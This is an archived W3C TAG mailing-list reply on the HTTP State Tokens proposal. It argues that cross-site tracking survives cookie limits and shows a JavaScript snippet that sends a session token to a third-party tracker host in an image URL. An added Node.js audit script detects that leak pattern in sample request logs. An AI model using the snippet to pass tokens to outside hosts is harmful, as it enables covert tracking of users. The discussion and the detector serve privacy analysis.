Re: [w3ctag/design-reviews] HTTP State Tokens (#297)

Third-party tracking would still be possible, even without access to third-party cookies. A first-party browsing context could create an element, or execute an XHR, with a URL formed from the session token.

 

var img = new Image();
img.src = "//www.third-party-tracker.com?token=" + token;

 

www.third-party-tracker.com could concatenate the token with the Referrer header to create a cross-origin unique identifier, or the first-party origin could be in another URL param.

 

 

From: Mike West <notifications@github.com> 
Sent: 01 November 2018 10:19
To: w3ctag/design-reviews <design-reviews@noreply.github.com>
Cc: Subscribed <subscribed@noreply.github.com>
Subject: Re: [w3ctag/design-reviews] HTTP State Tokens (#297)

 

It still seems like there is a reduction in the ability to study/monitor first-party tracking.

I don't understand how. But I'd love to chat about it more! :)

—
You are receiving this because you are subscribed to this thread.
Reply to this email directly or view it on GitHub <https://github.com/w3ctag/design-reviews/issues/297#issuecomment-434996368>.



-- 
You are receiving this because you are subscribed to this thread.
Reply to this email directly or view it on GitHub:
https://github.com/w3ctag/design-reviews/issues/297#issuecomment-435004246

Received on Thursday, 1 November 2018 10:52:01 UTC
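
Added example, not part of the original thread: a Node.js audit check for the pattern described in the message above, where a first-party token is placed in a URL sent to another site. Apart from www.third-party-tracker.com, every host, the token value, the request list and the function names are constructed for illustration; the "last two host labels" site comparison is a simplifying assumption.

```javascript
// Added example (Node.js). Hosts, token and requests are constructed sample data.
const SAMPLE_TOKEN = "s3ss10n-t0k3n-constructed";
const B64 = Buffer.from(SAMPLE_TOKEN).toString("base64");
const SAMPLE_REQUESTS = [
  { pageUrl: "https://shop.example/cart", referer: "https://shop.example/cart",
    url: "//www.third-party-tracker.com?token=" + SAMPLE_TOKEN },
  { pageUrl: "https://shop.example/cart", referer: "https://shop.example/cart",
    url: "https://static.shop.example/app.js?v=3" },
  { pageUrl: "https://shop.example/cart", referer: "",
    url: "https://cdn.example.net/p.gif?d=" + encodeURIComponent(B64) + "&o=shop.example" },
];

// Assumption: "site" = last two host labels. A real audit should use the
// Public Suffix List to compute the registrable domain.
function site(host) {
  return host.toLowerCase().split(".").slice(-2).join(".");
}

// Encodings of the token worth searching for in an outgoing URL.
function tokenForms(token) {
  const bytes = Buffer.from(token, "utf8");
  return [token, bytes.toString("base64"), bytes.toString("hex")];
}

function safeDecode(s) {
  try { return decodeURIComponent(s); } catch { return s; } // malformed %xx
}

// requests: [{ pageUrl, url, referer }] from a proxy log or HAR export.
function findTokenLeaks(requests, token) {
  const forms = tokenForms(token);
  const findings = [];
  for (const req of requests) {
    const page = new URL(req.pageUrl);
    const target = new URL(req.url, req.pageUrl); // resolves "//host/..." forms
    if (site(page.hostname) === site(target.hostname)) continue; // same site
    const raw = target.pathname + target.search;
    const decoded = safeDecode(raw);
    if (!forms.some((f) => raw.includes(f) || decoded.includes(f))) continue;
    findings.push({
      recipient: target.hostname,
      // Referer, or the origin in another parameter, lets the recipient
      // pair the token with the first-party site.
      originExposed: Boolean(req.referer) || decoded.includes(page.hostname),
    });
  }
  return findings;
}

console.log(findTokenLeaks(SAMPLE_REQUESTS, SAMPLE_TOKEN));
```

The check only finds the token in plain, URL-encoded, base64 or hex form; a token hashed or encrypted before sending would need the same transformation added to `tokenForms`.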